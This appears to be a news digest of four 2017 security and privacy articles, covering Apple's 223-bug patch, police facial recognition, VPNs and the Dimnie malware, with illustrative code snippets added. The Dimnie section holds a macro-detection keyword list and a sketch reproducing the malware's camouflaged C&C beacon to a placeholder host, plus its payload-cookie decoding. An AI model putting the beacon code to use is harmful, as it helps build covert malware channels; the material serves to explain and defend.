source:  threatpost.com

Apple fixed hundreds of bugs, 223 to be exact, across a slate of products including macOS Sierra, iOS, Safari, watchOS, and tvOS on Monday.

More than a quarter of the bugs (40 in macOS Sierra and 30 in iOS) could lead to arbitrary code execution, in some instances with root privileges, Apple warned.

The lion’s share of the vulnerabilities patched Monday, 127 in total, were fixed in the latest version of macOS Sierra, 10.12.4.

Ian Beer, a researcher with Google’s Project Zero group, uncovered seven of the vulnerabilities, including six that could have enabled an application to execute arbitrary code with kernel privileges. South Korean hacker Jung Hoon Lee, perhaps better known in hacking circles by his handle Lokihardt, is credited for finding two vulnerabilities as well – one in the kernel and one in WebKit. Lokihardt, a veteran of Pwn2Own competitions, joined Project Zero in December 2016.

The update also fixed a memory corruption issue that stemmed from how certificates were parsed. The bug, technically a use-after-free vulnerability, existed in the X.509 certificate validation functionality present in macOS and iOS. According to Aleksandar Nikolic, a researcher with Cisco’s Talos Security Intelligence and Research Group who found the bug, an attacker with a specially crafted X.509 certificate could have triggered it and carried out remote code execution. Nikolic says a victim could be tricked in several ways: by being served a malicious cert via a website, by the Mail app connecting to a mail server that presents a malicious cert, or by opening a malicious cert to import it into the keychain.
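
The dangerous operation here is simply parsing an untrusted certificate, before any trust decision is made. As a rough illustration of that step (not Apple's implementation; this sketch uses the third-party Python cryptography package and a hypothetical file name), loading an attacker-supplied DER-encoded cert looks like this:

    # Illustrative only: parsing an untrusted X.509 certificate, the kind of
    # operation the patched use-after-free sat behind. Uses the Python
    # "cryptography" package, not Apple's Security framework.
    from cryptography import x509
    from cryptography.hazmat.primitives import hashes

    with open("untrusted_cert.der", "rb") as f:  # hypothetical attacker-supplied file
        der_bytes = f.read()

    # Parsing alone exercises the certificate-handling code path;
    # no signature check or trust decision has happened yet.
    cert = x509.load_der_x509_certificate(der_bytes)
    print(cert.subject.rfc4514_string())
    print(cert.fingerprint(hashes.SHA256()).hex())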

Talos claims it verified the most recent versions of macOS Sierra, 10.12.3, and iOS, 10.2.1, are vulnerable. Older versions of the operating systems are likely affected too, the firm claims.

As usual, a large chunk of the vulnerabilities in the OS were addressed by updating the open source software that macOS bundles to newer versions. Forty-one different bugs were fixed by updating tcpdump, a free packet analyzer, to version 4.9.0. Eleven vulnerabilities were fixed by updating Apache and PHP to versions 2.4.25 and 5.6.30, respectively. Four vulnerabilities were addressed by updating OpenSSH in macOS to version 7.4.
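
To confirm a system picked up the newer versions after installing the update, each bundled tool can report its own version. The snippet below is a small, hypothetical Python helper that shells out to the standard version flags and compares the output against the versions named above:

    # Minimal sketch: check the versions of the open source components
    # updated in macOS 10.12.4. Each tool prints its version banner to
    # stdout or stderr, so capture both.
    import subprocess

    CHECKS = [
        (["tcpdump", "--version"], "4.9.0"),   # tcpdump
        (["httpd", "-v"], "2.4.25"),           # Apache (shipped as httpd)
        (["php", "-v"], "5.6.30"),             # PHP
        (["ssh", "-V"], "7.4"),                # OpenSSH
    ]

    for cmd, expected in CHECKS:
        out = subprocess.run(cmd, capture_output=True, text=True)
        banner = (out.stdout + out.stderr).strip().splitlines()[0]
        status = "ok" if expected in banner else "check manually"
        print(f"{cmd[0]:8} -> {banner}  [{status}]")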

 

source:  defenseone.com

Combined with police body cameras, it could redefine the nature of public spaces.

Police body cameras are widely seen as a way to improve law enforcement’s transparency with the public. But when mixed with police use of facial-recognition tools, the prospect of continual surveillance comes with big risks to privacy.

Facial-recognition technology combined with police body cameras could “redefine the nature of public spaces,” Alvaro Bedoya, executive director of the Georgetown Law Center on Privacy & Technology, told the House oversight committee at a hearing March 22. It’s not a distant reality, and it threatens civil liberties, he warned.

Technologists already have tools, and are developing more, that allow police to recognize people in real time. Of 38 manufacturers who make 66 different products, at least nine already have facial recognition technology capabilities or have made accommodations to build it in, according to a 2016 Johns Hopkins University report, created for the Justice Department, on the body-worn camera market.

Rather than looking back retrospectively at footage, cops with cameras and this technology can scan people as they pass and assess who they are, where they’ve been, and whether they are wanted for anything from murder to a traffic ticket, with the aid of algorithms. This, say legal experts, puts everyone—even law-abiding citizens—under perpetual surveillance and suspicion.
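
At its core, the matching step in systems like these reduces each face to a numeric embedding and compares it against a database of known faces. The sketch below shows that comparison in generic terms; the random vectors are placeholders for the output of a real face-embedding model, which the article does not specify:

    # Generic illustration of real-time face matching: compare a probe
    # embedding from a camera frame against a watchlist using cosine
    # similarity. Random vectors stand in for a trained model's output.
    import numpy as np

    rng = np.random.default_rng(0)
    watchlist = {                    # hypothetical enrolled identities
        "subject_a": rng.normal(size=128),
        "subject_b": rng.normal(size=128),
    }
    probe = rng.normal(size=128)     # embedding from the current frame

    def cosine(a, b):
        return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

    THRESHOLD = 0.6                  # arbitrary cutoff, for illustration only
    scores = {name: cosine(vec, probe) for name, vec in watchlist.items()}
    best = max(scores, key=scores.get)
    print(best, round(scores[best], 3),
          "match" if scores[best] >= THRESHOLD else "no match")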

A 2016 report from the Georgetown Law Center on Privacy & Technology notes the free speech and privacy concerns this raises, and warns that citizens will become unwitting participants in an unending police procedure. From the report:

There is a knock on your door. It’s the police. There was a robbery in your neighborhood. They have a suspect in custody and an eyewitness. But they need your help: Will you come down to the station to stand in the line-up? Most people would probably answer “no.”

The researchers note that 16 states already let the FBI use face-recognition technology to compare suspected criminals to their driver’s license or other ID photos, creating an algorithmically determined virtual lineup of residents. And state and local police departments are building their own face recognition systems, too.

“Face recognition is a powerful technology that requires strict oversight. But those controls by and large don’t exist today,” said Clare Garvie, one of the report’s authors. “With only a few exceptions, there are no laws governing police use of the technology, no standards ensuring its accuracy, and no systems checking for bias. It’s a wild west.”

The interest in this technology extends internationally. NTechLab, which is located in Cyprus and Russia and claims to make the world’s most accurate facial-recognition technology, has pilot projects in 20 countries, including the U.S., China, and Turkey. The company says it uses machine learning to “build software that makes the world a safer and more comfortable place.”

 

source: wired.com

The House of Representatives voted to reverse regulations that would have stopped internet service providers from selling your web-browsing data without your explicit consent. It’s a disappointing setback for anyone who doesn’t want big telecoms profiting off of their personal data. So what to do? Try a Virtual Private Network. It won’t fix all your privacy problems, but a VPN’s a decent start.

In case you’re not familiar, a VPN is a private, controlled network that connects you to the internet at large. Your connection with your VPN’s server is encrypted, and if you browse the wider internet through this smaller, secure network, it’s difficult for anyone on the outside to eavesdrop on what you’re doing. A VPN also takes your ISP out of the loop on your browsing habits, because all the ISP sees is an endless log of you connecting to the VPN server.
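
To make the “endless log of you connecting to the VPN server” point concrete, here is a deliberately simplified sketch: it opens one encrypted TLS connection to a stand-in VPN endpoint and sends traffic inside it. Real VPNs use dedicated protocols such as WireGuard, OpenVPN, or IKEv2 rather than a hand-rolled TLS socket, and the hostname is hypothetical:

    # Simplified illustration of the VPN idea: application traffic rides
    # inside one encrypted connection, so an observer at the ISP sees only
    # your machine talking to the tunnel endpoint, not the sites you visit.
    # "vpn.example.com" is a placeholder, not a real service.
    import socket
    import ssl

    context = ssl.create_default_context()

    with socket.create_connection(("vpn.example.com", 443)) as raw:
        with context.wrap_socket(raw, server_hostname="vpn.example.com") as tunnel:
            # Anything written here is encrypted before it leaves the machine.
            # The ISP's logs would show only: your IP <-> vpn.example.com:443.
            tunnel.sendall(b"GET / HTTP/1.1\r\nHost: vpn.example.com\r\n\r\n")
            print(tunnel.recv(1024))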

There are more aggressive ways of hiding your browsing and more effective ways of achieving anonymity. The most obvious option is to use the Tor anonymous browser. But attempting to use Tor for all browsing and communication is difficult and complicated. It’s not impossible, but it’s probably not the easy, broad solution you’re looking for day to day to protect against an ISP’s prying eyes.

Trust Factors

VPNs can shield you from your big bad cable company, but they are also in a position to potentially do all the same things you were worried about in the first place—they can access and track all of your activities and movements online. So for a VPN to be any more private than an ISP, the company that offers the VPN needs to be trustworthy. That’s a very tricky thing to confirm.

 

source: securityweek.com

Stealthy command and control methods allowed a newly discovered malware family to fly under the radar for more than three years, Palo Alto Networks security researchers reveal.

Dubbed Dimnie, the threat was discovered in mid-January 2017, when it was targeting open-source developers via phishing emails. An attached malicious .doc file contained embedded macro code that executed a PowerShell command to download and execute a file.
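
For defenders, the delivery chain described above (macro, then PowerShell, then download-and-execute) can often be spotted before the document is opened. The sketch below uses the open-source oletools package, which the article does not mention, to pull macro code out of a hypothetical .doc attachment and flag suspicious keywords:

    # Sketch: flag a Word document whose macros resemble the Dimnie
    # delivery chain (macro -> PowerShell -> download and execute).
    # Requires the open-source "oletools" package; filename is hypothetical.
    from oletools.olevba import VBA_Parser

    SUSPICIOUS = ("powershell", "downloadfile", "downloadstring", "shell")

    parser = VBA_Parser("suspicious_attachment.doc")
    if parser.detect_vba_macros():
        for _, _, vba_filename, vba_code in parser.extract_macros():
            hits = [kw for kw in SUSPICIOUS if kw in vba_code.lower()]
            if hits:
                print(f"{vba_filename}: suspicious keywords {hits}")
    else:
        print("no macros found")
    parser.close()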

The first samples pertaining to this malware family date back to early 2014, but stealthy command and control (C&C) methods, combined with a Russia-focused target base, helped the threat go unnoticed until this year. Dimnie, which attempted a global reach with its January 2017 campaign, is capable of downloading additional malware and stealing information from compromised systems.

The malware has a modular design and can hinder analysis by injecting each of its modules into the memory of core Windows processes. What’s more, the malware appears to have undergone a series of changes over time, Palo Alto Networks reveals.

Looking at the threat’s communication with its C&C infrastructure, the security researchers discovered that it sends HTTP proxy-style requests addressed to the Google PageRank service, which hasn’t been available to the public since last year. Because the absolute URI in the request points to a now-defunct service, the receiving server clearly isn’t acting as a proxy; the seemingly RFC-compliant request is merely camouflage.
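
That camouflage amounts to an HTTP request whose request line carries an absolute URI, the form a client normally uses only when talking to a proxy, while the TCP connection actually goes straight to the attacker’s server. A hedged sketch of what such a request could look like on the wire (the C&C address is a placeholder, not an indicator from the report, and the Google URL is in the style of the retired PageRank toolbar queries):

    # Illustration of proxy-style camouflage: the request line names a
    # Google PageRank toolbar URL in absolute form, as if the receiving
    # host were a proxy, but the socket is opened directly to the C&C
    # server, which ignores the stated destination. Address is a placeholder.
    import socket

    C2_HOST, C2_PORT = "c2.example.net", 80   # hypothetical C&C endpoint

    request = (
        "GET http://toolbarqueries.google.com/tbr?features=Rank HTTP/1.1\r\n"
        "Host: toolbarqueries.google.com\r\n"
        "Connection: close\r\n"
        "\r\n"
    )

    with socket.create_connection((C2_HOST, C2_PORT)) as sock:
        sock.sendall(request.encode("ascii"))
        reply = sock.recv(4096)   # the "response" carries the encrypted payload
    print(reply[:200])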

Analysis of the HTTP traffic also reveals that the malware uses an AES key to decrypt payloads, which are encrypted with AES-256 in ECB mode. The server’s reply additionally contains a Cookie value: a 48-byte, base64-encoded, AES-256-ECB-encrypted series of UINT32 values pertaining to the payload. The malware uses the Cookie parameter to verify the payload’s integrity.
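
Reconstructing that check is mechanical once the AES key is recovered. The sketch below, using the third-party pycryptodome library and placeholder values (the real key, the byte order, and the meaning of the individual fields are not given in the article), base64-decodes a Cookie value, decrypts it with AES-256 in ECB mode, and unpacks the 48-byte plaintext into twelve UINT32 values:

    # Sketch of the Cookie handling described above: base64-decode, decrypt
    # with AES-256-ECB, then read the plaintext as UINT32s. Key, cookie, and
    # little-endian byte order are assumptions, not values from the malware.
    import base64
    import struct
    from Crypto.Cipher import AES   # pycryptodome

    AES_KEY = bytes(range(32))                      # placeholder 256-bit key

    def decode_cookie(cookie_b64: str) -> tuple:
        ciphertext = base64.b64decode(cookie_b64)   # 48 bytes = 3 AES blocks
        plaintext = AES.new(AES_KEY, AES.MODE_ECB).decrypt(ciphertext)
        return struct.unpack("<12I", plaintext)     # twelve UINT32 fields

    # Round-trip with dummy data: encrypt twelve integers, then decode them.
    dummy = AES.new(AES_KEY, AES.MODE_ECB).encrypt(struct.pack("<12I", *range(12)))
    print(decode_cookie(base64.b64encode(dummy).decode()))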